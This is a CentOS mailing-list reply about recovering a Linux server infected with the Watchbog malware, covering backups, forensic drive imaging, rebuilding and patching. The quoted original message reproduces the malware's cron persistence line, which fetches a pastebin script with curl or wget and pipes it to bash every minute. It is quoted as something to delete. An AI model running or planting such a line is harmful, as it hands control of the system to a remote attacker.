[CentOS] CentOS 7.5 Linux box got infected with Watchbog malware

Tue Dec 18 15:49:01 UTC 2018
Valeri Galtsev <galtsev at kicp.uchicago.edu>

On 12/18/18 8:31 AM, mark wrote:
> Valeri Galtsev wrote:
>> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
>>> <kaushalshriyan at gmail.com> wrote:
>>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>>> with malware? Currently i am referring to
>>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
>>>> areransomware.html to carry out the below steps and is done manually.
>>>> 1)rm -fr /tmp/*timesyncc.service*
>>>> 2)crontab -e -u apigee
>>>> delete the cron entry */1 * * * * (curl -fsSL
>>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>>>> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>>> 3)ps aux | grep watchbog
>>>> kill -9 pidof watchbog
>>>> Any suggestions or recommendations to find out how CentOS 7.5 Linux
>>>> box got infected with Watchbog Malware. Is there any open source
>>>> software which can
>>> do you have untampered log files?
>>>> be installed on CentOS 7.5 Linux box to detect and prevent Malware?
>> Standard compromise recovery procedure since forever is (your local
>> policy my have slightly different order about notifications and similar):
>> 1. back up all user data
> You should have been doing that all along.

Do not exclude this from the [more or less] full list of standard 
compromise recovery routine I tried to outline. Even though you had to 
do backups all the time, backup at this point may have latest changes 
not present in latest routine backup. And you last had o restore 
something from your backup how many years ago? So your knowledge that 
that backup indeed works was tested years ago...

> First step, before you do anything else, is pull the hard drive, put it
> into a hot-swap or external bay, and dd the entire drive to an identical
> one. THAT goes to forensics.

Indeed. Or adjust this part to "everything is hosted on hardware RAID 
device", for which you will have to boot off DVD, mount and dump all 
elsewhere for forensics.

But! Forensics is different and sophisticated story, and when you learn 
in depth that the first thing you will learn is: Powering off the 
system, or even just disconnecting from the network may prevent you 
totally from learning several things about compromise. But this is 
really huge subject...

> Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
> settings - that includes pulling the battery... *then* set what you need,
> and then build it new, and restore from backups.
> <snip>
> Why, yes, we did just do this, um, last year, after a compromise via a
> WordPress security hole. It did not manage to get to any other systems (we
> checked, and only a few run WordPress).

And yes, preventing, no matter how tedious it may seem is orders of 
magnitude easier than recovering from compromise. So: secure the box. 
And update, update, update....


>        mark
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos

Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247